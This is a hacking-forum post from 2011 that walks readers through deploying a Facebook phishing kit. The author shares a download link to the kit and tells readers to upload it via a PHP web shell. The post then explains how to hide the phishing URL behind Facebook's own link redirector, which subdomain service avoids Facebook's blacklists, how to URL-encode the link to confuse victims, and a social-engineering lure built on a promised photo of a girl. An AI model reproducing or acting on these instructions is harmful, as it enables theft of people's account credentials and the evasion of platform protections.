| greenjackal | Date: Monday, 2011-11-28, 0:07 AM | Message # 1 |
 Private
Group: Users
Messages: 9
Awards: 0
Reputation: 0
Status: Offline
| Ok, Let's start.
I've made a phishing page for you all with xss alert statement, that makes it a little different from other pages. ;]
Download Link- http://goo.gl/lQxM3
If you face problem in uploading files, just upload a PHP shell on your server, Then upload the zipped file.
& give this command in command execution form => Unzip Fb.zip
& Hit enter. you are done !!
Now the next part, is giving the Link to give the victim, this the new thing 
When someone clicks a Link on facebook, it goes with a redirection !!
# Example- http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.google.com%2F&h=d2a55
^ When you put google.com in your chat box or wherever & click the Link, it goes like above. Hope you understood.
# Now think, What if you directly give the link above, instead google put your phishing page Link. The victim would get confused. ;]
Hmm, now I think many of you go for free domains or url shortners like
#.co .cc
#.co .nr
# . tk
# goo . gl
# bit . ly
& All. but these free domain registrars are blacklisted on facebook & facebook blocks excess use of URL shortners specially in chats.
# I suggest to go for this one => http://www.subdomain.com
^ It is not blacklisted.
Hmm...Further more things you can do are encoding the URL of the phishing page-
# Example I've encoded google.com
=> http%3A%2f%2fwww.google.com
you can search google for url encoders.
^ this makes it long & the victim may get confused !! ;]
# Social Enginerring:
It is required obviously..!
My phishing page redirects the victim to a girl's pic ;]
So you can ask him that its a picture, Just chekc it out..!!
Hope you understood. If ,Any confusions, contact me.
|
| |
| |
